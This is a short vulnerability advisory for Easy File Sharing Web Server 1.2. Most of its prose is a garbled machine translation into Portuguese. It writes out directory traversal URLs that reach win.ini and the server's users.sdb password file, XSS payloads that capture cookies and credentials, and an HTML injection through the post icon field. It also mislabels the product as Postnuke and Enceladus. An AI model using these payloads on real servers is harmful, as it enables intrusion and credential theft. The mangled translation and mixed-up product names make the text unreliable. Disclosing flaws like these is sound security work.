Advisory for Easy File Sharing web server 1.2...
---
------------------------------------------------------------------
Easy File Sharing Web Server 1.2
------------------------------------------------------------------
-= by Dr_insane ([email protected]) =-

Product:
--------
Easy File Sharing Web Server 1.2Vunerability(s):
----------------
1.Directory Bugs Do Traversal
2.XSS vulnerabilidades
3.HTML Injeção
4.Passwords em texto claro
Descrição de produto:
-----------------------
Arquivo Fácil Compartilhando Servidor De Web é um arquivo compartilhando sistema que permite visitantes para upload/download arquiva facilmente através de um Browser De Web (IE, Netscape, etc de Ópera.). Isto pode ajudar você compartilha arquivos com seus amigos e colegas. Eles podem descarregar arquivos de seu computador ou upload arquiva de theirs.They não estará requerido instalar este software ou qualquer outro software porque um browser internet é bastante. Arquivo Fácil Compartilhando Servidor De Web também fornece um Boletim Hospeda Sistema (BBS, Forum). Isto permite usuários remotos para postar mensagens e arquiva ao forum. VUNERABILITY / FAÇANHA
======================
Há vulnerabilidades múltiplas no Postnuke Arquivo Fácil Compartilhando Servidor De Web 1.2 como descrito baixo.
1.Directory atravessando
Arquivo Fácil Compartilhando Servidor De Web tem uma Vulnerabilidade Do Traversal De Diretório Usando o fio '../' em uma URL, um attacker pode ganhar lê acesso para qualquer exterior de arquivo do diretório web-publicado do filesystem pretendido.
Há não muito para expandir neste um....
Exemplo:
http://127.0.0.1/../../../autoexec.bat to show autoexec.bat
http://127.0.0.1/.../.../.../program files/Easy File Sharing Web Server/users.sdb get the server password file
Also:
http://127.0.0.1/msg.ghp?forumid=4&id=/../../../../../../../../windows/win.ini
http://127.0.0.1/msg.ghp?forumid=/../../../../../../../../windows/win.ini
etc etc etc
2.XSS vulnerabilidades
Uma vulnerabilidade existe no Arquivo Fácil Compartilhando Servidor De Web que envolve incorreto filtro de dados de assinatura de servidor. A vulnerabilidade podia habilitar um attacker para sessões de web do hijack, permitindo uma série de compromissos potenciais no anfitrião do targeted.
As urls vulneráveis estão:
http://127.0.0.1/newmsg.ghp?forumid=1 Insert Evil javascript code in "Your message field"
A seguinte URL demonstrará o ataque:
Alguns browsers submetem o malicious hospeda cabeçalho quando analisando gramaticalmente esta solicitação:
Host: <img src="" onerror="alert(document.cookie)">
ex. if we supply this code: <script>alert(document.cookie)</script> we will get:
TEMPLATE:standard;LANG=english; TOKEN:121234122; TOKEN_1=34123123; SHOW_FEATURES=0; db_pass; db_user; SESSIONID=1172; UsserID:dr_insane; PassWD=passtest1111
Isto é possbile para alguém para obter o username e o password.In nosso exemplo
O username is:dr_insane e a senha: passtest1111
3.HTML Injeção
Qualquer usuário pode injetar código de html quando cria um novo postado.
O bug está no icone postado :
&lt;img src="icon.gif" etc.&gt;
Se você cria um formulário personalizado com este código: icon.gif"&gt;
&lt;script&gt;alert('bug');&lt;script&gt;&lt;anytag="
the final code of the post icon is :
&lt;imgsrc="icon.gif"&gt;&lt;script&gt;alert('bug');&lt;script&gt;&lt;anytag="" etc.&gt;
4.Passwords em texto claro
Uma vulnerabilidade tem sido identificada em suíte de Servidor Do Enceladus permitindo malicious, usuários locais para ver o usernames e senhas.
O problema é aquele usernames e senhas ao servidor são armazenadas em texto claro na pasta "users.sdb".Local:
------

Cracks's S.A